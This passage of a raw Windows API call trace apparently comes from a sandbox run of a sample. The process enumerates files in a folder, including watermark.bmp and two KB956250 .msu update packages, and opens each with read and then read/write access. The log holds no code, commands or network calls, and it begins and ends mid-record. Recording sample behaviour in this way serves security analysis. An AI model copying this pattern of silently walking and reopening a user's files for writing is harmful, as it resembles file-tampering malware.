lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\watermark.bmp", lpUsedDefaultChar=0x0) returned 36 [0068.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0068.771] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.771] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0068.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0068.772] AreFileApisANSI () returned 1 [0068.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0068.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0068.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\watermark.bmp") returned 36 [0068.772] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\watermark.bmp" (normalized: "c:\\588bce7c90097ed212\\watermark.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0068.772] GetFileType (hFile=0x410) returned 0x1 [0068.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0068.772] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0068.772] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0068.772] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0068.773] CloseHandle (hObject=0x410) returned 1 [0068.773] AreFileApisANSI () returned 1 [0068.773] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0068.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69300 [0068.773] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x69300, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\watermark.bmp") returned 36 [0068.773] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\watermark.bmp" (normalized: "c:\\588bce7c90097ed212\\watermark.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0068.773] GetFileType (hFile=0x410) returned 0x1 [0068.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0068.773] CloseHandle (hObject=0x410) returned 1 [0068.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0068.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0068.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0068.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0068.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0068.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0068.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0068.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0068.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0068.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0068.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0068.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0068.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0068.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0068.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0068.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0068.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0068.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0068.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0068.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0068.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0068.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0068.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0068.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0068.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0068.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0068.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0068.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0068.774] AreFileApisANSI () returned 1 [0068.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0068.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0068.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\watermark.bmp") returned 36 [0068.774] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\watermark.bmp" (normalized: "c:\\588bce7c90097ed212\\watermark.bmp"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x87910600, ftCreationTime.dwHighDateTime=0x1ca2a27, ftLastAccessTime.dwLowDateTime=0x87910600, ftLastAccessTime.dwHighDateTime=0x1ca2a27, ftLastWriteTime.dwLowDateTime=0x87910600, ftLastWriteTime.dwHighDateTime=0x1ca2a27, nFileSizeHigh=0x0, nFileSizeLow=0x19688)) returned 1 [0068.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0068.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0068.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0068.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0068.774] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.774] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.774] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2120bc00, ftCreationTime.dwHighDateTime=0x1cac6c9, ftLastAccessTime.dwLowDateTime=0x2120bc00, ftLastAccessTime.dwHighDateTime=0x1cac6c9, ftLastWriteTime.dwLowDateTime=0x2120bc00, ftLastWriteTime.dwHighDateTime=0x1cac6c9, nFileSizeHigh=0x0, nFileSizeLow=0x4f5113, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Windows6.0-KB956250-v6001-x64.msu", cAlternateFileName="WINDOW~1.MSU")) returned 1 [0068.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0068.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0068.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0068.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0068.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0068.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0068.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0068.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0068.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0068.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0068.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0068.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0068.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0068.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0068.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0068.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0068.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0068.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0068.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0068.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0068.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0068.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0068.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0068.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0068.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0068.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0068.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0068.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0068.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0068.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0068.775] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.775] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.775] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.775] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0068.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0068.775] AreFileApisANSI () returned 1 [0068.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu", lpUsedDefaultChar=0x0) returned 56 [0068.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0068.775] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.775] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0068.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0068.776] AreFileApisANSI () returned 1 [0068.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0068.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0068.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x75d50, cchWideChar=56 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu") returned 56 [0068.776] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x64.msu"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0068.777] GetFileType (hFile=0x410) returned 0x1 [0068.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0068.777] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0068.777] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0068.777] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0068.777] CloseHandle (hObject=0x410) returned 1 [0068.777] AreFileApisANSI () returned 1 [0068.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0068.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0068.778] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x75cd8, cchWideChar=56 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu") returned 56 [0068.778] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x64.msu"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0068.778] GetFileType (hFile=0x410) returned 0x1 [0068.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0068.778] CloseHandle (hObject=0x410) returned 1 [0068.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0068.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0068.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0068.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0068.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0068.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0068.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0068.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0068.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0068.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0068.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0068.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0068.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0068.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0068.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0068.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0068.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0068.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0068.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0068.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0068.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0068.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0068.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0068.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0068.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0068.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0068.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0068.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0068.779] AreFileApisANSI () returned 1 [0068.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0068.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0068.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x75eb8, cchWideChar=56 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu") returned 56 [0068.779] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x64.msu"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2120bc00, ftCreationTime.dwHighDateTime=0x1cac6c9, ftLastAccessTime.dwLowDateTime=0x2120bc00, ftLastAccessTime.dwHighDateTime=0x1cac6c9, ftLastWriteTime.dwLowDateTime=0x2120bc00, ftLastWriteTime.dwHighDateTime=0x1cac6c9, nFileSizeHigh=0x0, nFileSizeLow=0x4f5113)) returned 1 [0068.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0068.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0068.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0068.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0068.779] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.779] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.779] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x1bbe7400, ftCreationTime.dwHighDateTime=0x1cac6bf, ftLastAccessTime.dwLowDateTime=0x1bbe7400, ftLastAccessTime.dwHighDateTime=0x1cac6bf, ftLastWriteTime.dwLowDateTime=0x1bbe7400, ftLastWriteTime.dwHighDateTime=0x1cac6bf, nFileSizeHigh=0x0, nFileSizeLow=0x217520, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Windows6.0-KB956250-v6001-x86.msu", cAlternateFileName="WINDOW~2.MSU")) returned 1 [0068.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0068.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0068.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0068.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x690d0 [0068.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0068.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0068.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0068.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0068.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0068.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0068.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0068.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0068.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0068.780] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0068.780] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0068.780] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0068.780] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0068.780] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0068.780] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0068.780] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0068.780] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0068.780] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0068.780] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0068.780] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0068.780] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0068.780] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0068.780] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0068.780] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0068.780] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.780] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.780] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.780] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.780] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0068.780] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0068.780] AreFileApisANSI () returned 1 [0068.780] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu", 